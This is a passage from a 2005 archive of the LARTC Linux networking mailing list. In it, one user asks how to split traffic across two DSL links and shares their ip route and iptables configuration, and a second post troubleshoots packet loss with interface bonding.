From ro0ot@phreaker.net Wed Feb 9 08:40:47 2005 From: ro0ot@phreaker.net (ro0ot) Date: Wed, 09 Feb 2005 16:40:47 +0800 Subject: [LARTC] load balancing between two dsl links Message-ID: <4209CC8F.40406@phreaker.net> Hi, I am connected to two DSL providers (DSL 1 - 1Mbps downlink/384kbps uplink and DSL 2 - 2Mbps downlink/512kpbs uplink) I would like to only allow ftp, pop3 and http via the DSL 1 and only smtp, ipsec and pptp via DSL 2. How can I do so? Can I use iproute to route these protocols? Below is my ip routing: - # DSL 1 ip route add 2.2.2.208/30 dev eth0 src 2.2.2.210 table 1 ip route add default via 2.2.2.209 table 1 # DSL 2 ip route add 3.3.3.116/30 dev eth2 src 3.3.3.118 table 2 ip route add default via 3.3.3.117 table 2 ip rule add from 2.2.2.208/30 lookup 1 ip rule add from 3.3.3.116/30 lookup 2 ip route add 3.3.3.116/30 dev eth2 table 1 ip route add 10.59.2.0/24 dev eth1 table 1 ip route add 127.0.0.0/8 dev lo table 1 ip route add 2.2.2.208/30 dev eth0 table 2 ip route add 10.59.2.0/24 dev eth1 table 2 ip route add 127.0.0.0/8 dev lo table 2 ip route add default scope global nexthop via 2.2.2.209 dev eth0 weight 1 nexthop via 3.3.3.117 dev eth2 weight 1 Below is my iptables: - lanif="eth1" squid_box="10.59.2.3" lan_net="10.59.2.0/24" $ECHO 1 > /proc/sys/net/ipv4/ip_forward $IPTABLES -t nat -A PREROUTING -i $lanif -s ! $squid_box -p tcp --dport 80 -j DNAT --to $squid_box:3128 $IPTABLES -t nat -A POSTROUTING -o $lanif -s $lan_net -d $squid_box -j SNAT --to $lan_ip $IPTABLES -A FORWARD -s $lan_net -d $squid_box -i $lanif -o $lanif -p tcp --dport 3128 -j ACCEPT $IPTABLES -t nat -A POSTROUTING -j MASQUERADE Regards, ro0ot From fubar@us.ibm.com Thu Feb 10 05:58:46 2005 From: fubar@us.ibm.com (Jay Vosburgh) Date: Wed, 09 Feb 2005 21:58:46 -0800 Subject: [LARTC] One "200Mbps" virtual link between 2 ethernet adaptators of 2 linux boxes. In-Reply-To: Message from "Francois" of "Thu, 10 Feb 2005 03:10:24 +0100." 
<20050210022030.D0D62408D@outpost.ds9a.nl> Message-ID: <200502100558.j1A5wkZF031492@death.nxdomain.ibm.com> Francois wrote: > ------- > | A | > | | > ------- > ___|__ > |switch| > |______| > ------- | | ------- >| B |eth0--- ---eth0| C | >| |eth1---------eth1| | > ------- ------- > >Machine A: (192.168.1.10) PC used to configure B&C (the only one that has a >screen) >Machine B&C: Very simple bonding configuration: > > >modprobe bonding mode=1 >ip addr add dev bond0 192.168.1.1/24 brd + #for B and .2 for C >ip link set bond0 up >ip link set eth0 up >ip link set eth1 up >ifenslave bond0 eth0 eth1 > >The bad thing is: B pinging C has 50% packet lost which would mean assuming >that the round robin of the module works that a route from one of the >interfaces doesn't reach C (pinging from A to 192.168.1.1 gives also 50%). >Anyone has an idea on this matter? First, if you set up bonding this way, check to see if the slaves have routes that supercede the route for the bonding master device. The slaves should not have any routes at all, all routing decisions are made against the master device. When bonding is set up by hand, the slaves can end up with routes if they are up and active prior to being enslaved. It's not generally a problem when bonding is set up at boot time. Assuming for the moment that the routing is ok, I'm also curious as to which link loses packets (the "eth0s with switch" or the "eth1s no switch"). Looking at the /var/log/messages for information from the bonding driver would also be useful; you might also look into enabling some link monitoring (just in case). Lastly, trying to get a single TCP connection to, essentially, see N interface's worth of throughput is a surprisingly difficult problem. This is a topic that comes up fairly regularly on the bonding-devel list; below is an article I posted last fall. 
The below references a discussion about round robin performance as it scales up to 4 adapters from a few years ago; that was done with 100 Mb/sec hardware, but the same would apply to gigabit links. As somebody else pointed out, when round robin was originally implemented in bonding, state of the art was 10 Mb/sec, one packet per interrupt, and reordering wasn't a problem. Today